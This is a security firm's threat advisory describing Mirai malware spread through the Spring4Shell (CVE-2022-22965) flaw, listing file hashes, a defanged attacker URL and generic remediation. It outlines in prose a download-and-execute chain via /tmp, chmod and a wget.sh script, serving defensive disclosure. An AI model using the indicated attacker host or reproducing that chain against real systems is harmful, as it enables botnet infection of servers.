• Services
    • Assess
      • Compromise Assessment
      • APT Assessment
      • Penetration Testing
      • Secure Architecture Design & Review
      • Red Team Assessment
      • Purple Team Assessment
      • Social Engineering
      • Source Code Review
    • Transform
      • SOC Consultancy
      •     SOC Maturity Assessment
      •     SOC Model Evaluation
      •     SOC Gap Analysis
      •     SIEM Gap Analysis
      •     SIEM Optimization
      •     SOC Content Pack
    • Train
      • Security Awareness and Training
      • Tabletop Exercise
      • Simulated Cyber Attack Exercises
    • Respond
      • Incident Response
      • Incident Analysis
  • Managed Security
    • Managed Security Monitoring
      • Remote SOC
      • Onsite SOC
      • Hybrid SOC
    • Managed Security Services
      • Managed Detection and Response
      • Managed Endpoint Detection and Response
      • Managed Threat Intelligence
      • Managed Threat Hunting
      • Managed Risk-Based SOAR
      • Managed Penetration Testing
  • Solutions
  • Resources
    • Blog
    • Press Release
    • Threat Advisory
  • Company
    • About Us
    • Careers
    • Contact
Rewterz Threat Alert – Lazarus APT Group – Active IOCs
April 11, 2022
Rewterz Threat Alert – APT MustangPanda – Active IOCs
April 11, 2022

Rewterz Threat Alert – Mirai Botnet Spread Using Spring4Shell Exploit – Active IOCs

April 11, 2022

Severity

High

Analysis Summary

CVE-2022-22965

Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux.

Note: This vulnerability is also known as Spring4Shell or SpringShell.

The RCE vulnerability gives threat actors full access to the compromised devices, making it a dangerous and critical vulnerability. Spring4Shell is being activly exploited by threat actors to execute and weaponize the Mirai malware. This exploitation mainly occured in the singapore region. The sample is first downloaded in the “/tmp” folder and once permission change is executed, it becomes executable using “chmod”. Later, the “wget.sh” script downloads the binaries fron the attacker’s server and executes the samples.

Impact

  • Server Outage
  • Data Loss
  • Website Downtime

Indicators of Compromise

MD5

  • bd0ad51f62599fe31d3b98a6640f7fc0
  • 67c5171bd5fadf75809a7cef8523d63a
  • 24a9da242b5d80f4df3164cd154b5c88
  • b62601cded538c051bf84eb893d3af1b
  • daa2a0aaebb794dc672f14cdf271fecc
  • a7de7cb5eff5f8ced23efe7eba90c33f
  • 850da4f2e67510e609f9b4db7dd7c8ed

SHA-256

  • 5fb0c8f3daef02b9d2ab285d0bf348cf1cb7c36708b0034ad0dee4998a16b9e9
  • af06644dd95a30d55162666331ea6de0832cdf6f3d1897b276fde7c94d45ad84
  • 3d8291da28ab42ba18a58efc18fb62e1d114af631cab678f823f7c28ff84e876
  • 0d4ad08e561a3e285000a0c211063d58b543442d2208729aa142883f69a6f5f1
  • 220179663c5a0974958caddf23709de8f26cdaee2c92c5920f3b4188e5a44b6f
  • 95e9e8e5e412813ff8e949946a5f8c1fbbfc3ead2e74233e432a833777086407
  • 9dc7ec24c42cbddb07f8a475297a52d64f8bcb9dc1a1090ac72e8ac27f56cc37

SHA-1

  • cc8b2f14c44c0bb86b7233afeb20134e01f84a83
  • 0ec68dc5bdb67e255f84c2677512ad928bc9a462
  • 9dc2a98f4fa683a299aad74f132f35b9957a8797
  • c9d9eba8cb12209d703fce6413eb3194eebbf39b
  • ae820885b3e7e8f4e72b97e769ca999636a309ce
  • 524d1cd7394ba3b966745b755dc0ccbe686b1eb8
  • 4d6cd3c4e51500f722962731ea5ec8b17a23e38a

URL

  • http[:]//45[.]95[.]169[.]143/The420smokeplace[.]dns/

Remediation

  • Upgrade your operating system.
  • Don’t open files and links from unknown sources.
  • Install and run anti-virus scans.
  • Services
    • Assess
      • Compromise Assessment
      • APT Assessment
      • Penetration Testing
      • Secure Architecture Design & Review
      • Red Team Assessment
      • Purple Team Assessment
      • Social Engineering
      • Source Code Review
    • Respond
      • Incident Response
      • Incident Analysis
  • Transform
    • SOC Consultancy
    •     SOC Maturity Assessment
    •     SOC Model Evaluation
    •     SOC Gap Analysis
    •     SIEM Gap Analysis
    •     SIEM Optimization
    •     SOC Content Pack
  • Train
    • Security Awareness and Training
    • Tabletop Exercise
    • Simulated Cyber Attack Exercises
  • Managed Security
    • Managed Security Monitoring
      • Remote SOC
      • Onsite SOC
      • Hybrid SOC
    • Managed Security Services
      • Managed Detection and Response
      • Managed Endpoint Detection and Response
      • Managed Threat Intelligence
      • Managed Threat Hunting
      • Managed Risk-Based SOAR
      • Managed Penetration Testing
  • Solutions
  • Resources
    • Blog
    • Threat Advisory
  • Company
    • About Us
    • Careers
    • Contact
COPYRIGHT © REWTERZ. ALL RIGHTS RESERVED.